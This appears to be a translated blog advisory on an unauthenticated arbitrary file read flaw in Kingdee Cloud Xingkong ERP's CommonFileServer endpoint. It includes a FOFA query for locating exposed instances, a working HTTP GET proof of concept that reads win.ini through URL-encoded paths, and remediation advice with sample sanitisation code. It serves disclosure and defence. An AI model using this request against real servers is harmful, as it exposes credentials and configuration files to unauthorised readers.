Kingdee Cloud Xingkong arbitrary file read vulnerability reproduction (0day)

0x01 Product Introduction

Kingdee Cloud Xingkong is a cloud-based enterprise resource planning (ERP) product that gives enterprises an integrated solution for financial management, supply chain management, and business process management. It targets large and medium-sized enterprises with multiple organizations and multiple profit centers, and positions itself as an open ERP cloud platform for the digital economy built around "openness, standardization and social interaction". Its services cover finance, supply chain, intelligent manufacturing, amoeba management, omni-channel marketing, e-commerce, HR, and enterprise Internet services, helping enterprises build a new ecosystem of digital marketing and management restructuring and strengthen their digital capabilities.

0x02 Vulnerability Overview

Because of improper permission settings on the Kingdee Cloud Xingkong CommonFileServer interface, an unauthenticated attacker can use this vulnerability to read arbitrary files on the server, including database credentials, API keys and configuration files, and thereby obtain system access and sensitive information.

0x03 Scope of Impact

Version 6.x, Version 7.x, Version 8.x (all affected)

0x04 Recurrence environment

FOFA: app="Kingdee Cloud Starry Sky-Management Center" 

0x05 Vulnerability Reproduction

PoC

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

PS: The vulnerability is simple and crude: the file name is appended directly after the /CommonFileServer/ path (with special characters URL-encoded).

Reading the IIS configuration file

0x06 Remediation Suggestions

Remove the service from Internet exposure and restrict directory permissions.

Sanitize input: hard-code or canonically encode the file-name parameter supplied by users, restrict file types with a whitelist, and reject parameters containing malicious characters or null bytes.
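The sanitization step above, as an added illustrative example (not code from the original post or from Kingdee): it decodes the requested name, rejects drive-letter colons, backslashes, null bytes and any directory component, enforces an extension whitelist, and finally confirms the resolved path is still under the served root. The root directory and the allowed extensions are hypothetical placeholders.

```python
import os
import posixpath
from urllib.parse import unquote

# Hypothetical values: the real CommonFileServer root and file types are not on the page.
FILE_ROOT = "/srv/commonfileserver"
ALLOWED_EXTENSIONS = {".pdf", ".xlsx", ".docx", ".png", ".jpg"}
# Backslashes, drive-letter colons and NUL bytes never belong in a plain file name.
FORBIDDEN_CHARS = set("\\:\x00")


def resolve_requested_file(raw_path, root=FILE_ROOT):
    """Return the absolute path that may be served, or None if the request is rejected."""
    # Decode twice: the PoC relies on percent-encoded separators, and a reverse proxy
    # or IIS may have decoded once already before the application sees the value.
    decoded = unquote(unquote(raw_path))
    if any(ch in FORBIDDEN_CHARS for ch in decoded):
        return None
    # Only a bare file name is accepted: any directory component means rejection.
    name = posixpath.basename(decoded)
    if name != decoded or name in ("", ".", ".."):
        return None
    # Whitelist the file type instead of blacklisting "dangerous" names.
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    # Defence in depth: the final canonical path must remain inside the served root.
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, name))
    if os.path.commonpath([full, root_real]) != root_real:
        return None
    return full
```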


Source: blog.csdn.net/qq_41904294/article/details/132030706